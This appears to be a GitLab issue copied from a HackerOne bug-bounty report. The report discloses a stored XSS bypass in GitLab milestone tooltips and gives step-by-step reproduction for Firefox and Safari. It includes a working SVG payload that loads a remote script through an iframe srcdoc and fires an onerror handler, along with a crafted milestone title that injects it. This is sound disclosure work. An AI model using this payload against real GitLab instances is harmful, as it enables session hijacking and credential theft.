Stored XSS in milestone tooltips

HackerOne report #1054401 by mike12 on 2020-12-08, assigned to @ngeorge1:

Report | Attachments | How To Reproduce

Report

Hi Gitlab!

I found a way to bypass the fix for my old report. See the vulnerable code.

This XSS works for:

  1. gitlab.com using Firefox (tested in Firefox 83.0)
  2. A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1)
Steps to reproduce using Firefox
  1. Open your browser and navigate to https://gitlab.com

  2. Create a new project

  3. Add a file named demo.svg to the project with the following content:

    <svg id="x"  
         xmlns="http://www.w3.org/2000/svg"  
         width="100"  
         height="100"  
    >  
        <!-- gitlab.com using Firefox -->  
        <foreignObject>  
            <iframe xmlns="http://www.w3.org/1999/xhtml"  
                    srcdoc='<script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js> </script>'></iframe>  
        </foreignObject>
    
        <!-- A self-hosted GitLab instance without CSP using Safari -->  
        <image href="foo" onerror="alert('onerror')"/>  
    </svg>  
  4. Navigate to Issues > Milestones

  5. Create a new milestone with the following title: <svg width="100"><use xlink:href="/<YOUR-USERNAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg> (Replace <YOUR-USERNAME> and <YOUR-PROJECT> with your values)

  6. Navigate to Issues > List

  7. Create a new issue

  8. Collapse the right sidebar
    1.png

  9. Click the milestone icon in the right sidebar

  10. Select the milestone created in step 5

  11. Hover your mouse over the milestone icon

2.png

Steps to reproduce using Safari
  1. Run a self-hosted Gitlab instance
  2. Repeat steps 2 through 11 from the "Steps to reproduce using Firefox" section.

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data, including credentials

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: